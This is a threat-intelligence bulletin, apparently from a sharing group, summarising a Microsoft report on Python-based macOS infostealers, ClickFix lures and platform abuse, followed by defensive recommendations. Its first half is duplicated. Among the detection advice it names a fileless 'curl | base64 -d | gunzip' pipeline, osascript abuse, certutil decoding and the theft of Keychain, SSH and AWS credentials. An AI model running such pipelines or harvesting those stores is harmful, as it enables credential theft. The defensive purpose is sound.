Infostealers Without Borders: Macos, Python Stealers, and Platform Abuse
Summary:
In early February 2026, Microsoft Threat Intelligence released a comprehensive analysis of the evolving threat landscape for macOS systems, specifically focusing on the rise of Python-based infostealers. The research highlights a shift in adversary tactics where attackers are increasingly moving beyond traditional Windows-centric malware to target the growing enterprise footprint of macOS. These "borderless" infostealers—including variants like Atomic Stealer (AMOS), Poseidon, and Cthulhu, leverage Python’s cross-platform capabilities and native macOS utilities like osascript to harvest sensitive data. The primary goal of these campaigns is the exfiltration of browser credentials, cryptocurrency wallets, and session cookies, which are then used to bypass multi-factor authentication (MFA) or sold as "initial access" on dark web marketplaces.
Beyond the technical shift to Python, the research identifies a significant evolution in distribution methods that exploit the "trust economy" of modern software development. Threat actors are increasingly moving away from simple malicious downloads toward sophisticated "ClickFix" campaigns and SEO poisoning. By masquerading as legitimate installers for popular tools, such as PDF editors, video conferencing software, or even AI-related utilities, adversaries trick users into executing terminal commands that bypass native macOS protections. This strategy effectively weaponizes the user's own administrative privileges, allowing the malware to operate "filelessly" or via ad-hoc signed executables that blend into the legitimate background noise of a developer's workstation.
Security Officer Comments:
This research underscores a critical shift in the "Macs are safer" narrative. As macOS adoption continues to climb in developer, executive, and creative roles within our member organizations, threat actors are professionalizing their macOS toolsets to match. The use of Python is particularly concerning for the IT sector because Python is a standard tool for many legitimate administrative and development tasks, allowing malicious scripts to blend into normal system activity more easily.
The impact on organizations is two-fold: first, a single compromised macOS endpoint can serve as a "golden ticket" into cloud environments through stolen session tokens, effectively neutralizing traditional MFA. Second, the abuse of trusted platforms like GitHub and legitimate-looking signed applications to distribute these stealers means that even security-conscious users are at risk. For organizations supporting hybrid or remote workforces, these stealers represent a direct threat to the integrity of SaaS-based supply chains and internal corporate repositories.
Suggested Corrections:
Organizations can follow these recommendations to mitigate threats associated with this threat:
Strengthen user awareness & execution safeguards
Harden macOS environments against native tool abuse
Control outbound traffic & staging behavior
Protect against Python-based stealers & cross-platform payloads
Microsoft also recommends the following mitigations to reduce the impact of this threat:
https://www.microsoft.com/en-us/sec...ers-macos-python-stealers-and-platform-abuse/
In early February 2026, Microsoft Threat Intelligence released a comprehensive analysis of the evolving threat landscape for macOS systems, specifically focusing on the rise of Python-based infostealers. The research highlights a shift in adversary tactics where attackers are increasingly moving beyond traditional Windows-centric malware to target the growing enterprise footprint of macOS. These "borderless" infostealers—including variants like Atomic Stealer (AMOS), Poseidon, and Cthulhu, leverage Python’s cross-platform capabilities and native macOS utilities like osascript to harvest sensitive data. The primary goal of these campaigns is the exfiltration of browser credentials, cryptocurrency wallets, and session cookies, which are then used to bypass multi-factor authentication (MFA) or sold as "initial access" on dark web marketplaces.
Beyond the technical shift to Python, the research identifies a significant evolution in distribution methods that exploit the "trust economy" of modern software development. Threat actors are increasingly moving away from simple malicious downloads toward sophisticated "ClickFix" campaigns and SEO poisoning. By masquerading as legitimate installers for popular tools, such as PDF editors, video conferencing software, or even AI-related utilities, adversaries trick users into executing terminal commands that bypass native macOS protections. This strategy effectively weaponizes the user's own administrative privileges, allowing the malware to operate "filelessly" or via ad-hoc signed executables that blend into the legitimate background noise of a developer's workstation.
Security Officer Comments:
This research underscores a critical shift in the "Macs are safer" narrative. As macOS adoption continues to climb in developer, executive, and creative roles within our member organizations, threat actors are professionalizing their macOS toolsets to match. The use of Python is particularly concerning for the IT sector because Python is a standard tool for many legitimate administrative and development tasks, allowing malicious scripts to blend into normal system activity more easily.
The impact on organizations is two-fold: first, a single compromised macOS endpoint can serve as a "golden ticket" into cloud environments through stolen session tokens, effectively neutralizing traditional MFA. Second, the abuse of trusted platforms like GitHub and legitimate-looking signed applications to distribute these stealers means that even security-conscious users are at risk. For organizations supporting hybrid or remote workforces, these stealers represent a direct threat to the integrity of SaaS-based supply chains and internal corporate repositories.
Suggested Corrections:
Organizations can follow these recommendations to mitigate threats associated with this threat:
Strengthen user awareness & execution safeguards
- Educate users on social‑engineering lures, including malvertising redirect chains, fake installers, and ClickFix‑style copy‑paste prompts common across macOS stealer campaigns such as DigitStealer, MacSync, and AMOS.
- Discourage installation of unsigned DMGs or unofficial “terminal‑fix” utilities; reinforce safe‑download practices for consumer and enterprise macOS systems.
Harden macOS environments against native tool abuse
- Monitor for suspicious Terminal activity—especially execution flows involving curl, Base64 decoding, gunzip, osascript, or JXA invocation, which appear across all three macOS stealers.
- Detect patterns of fileless execution, such as in‑memory pipelines using curl | base64 -d | gunzip, or AppleScript‑driven system discovery and credential harvesting.
- Leverage Defender’s custom detection rules to alert on abnormal access to Keychain, browser credential stores, and cloud/developer artifacts, including SSH keys, Kubernetes configs, AWS credentials, and wallet data.
Control outbound traffic & staging behavior
- Inspect network egress for POST requests to newly registered or suspicious domains—a key indicator for DigitStealer, MacSync, AMOS, and Python‑based stealer campaigns.
- Detect transient creation of ZIP archives under /tmp or similar ephemeral directories, followed by outbound exfiltration attempts.
- Block direct access to known C2 infrastructure where possible, informed by your organization’s threat‑intelligence sources.
Protect against Python-based stealers & cross-platform payloads
- Harden endpoint defenses around LOLBIN abuse, such as certutil.exe decoding malicious payloads.
- Evaluate activity involving AutoIt and process hollowing, common in platform‑abuse campaigns.
Microsoft also recommends the following mitigations to reduce the impact of this threat:
- Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown threats.
- Run EDR in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
- Enable network protection and web protection in Microsoft Defender for Endpoint to safeguard against malicious sites and internet-based threats.
- Encourage users to use Microsoft Edge and other web browsers that support Microsoft Defender SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.
- Allow investigation and remediation in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
- Turn on tamper protection features to prevent attackers from stopping security services. Combine tamper protection with the DisableLocalAdminMerge setting to prevent attackers from using local administrator privileges to set antivirus exclusions.
https://www.microsoft.com/en-us/sec...ers-macos-python-stealers-and-platform-abuse/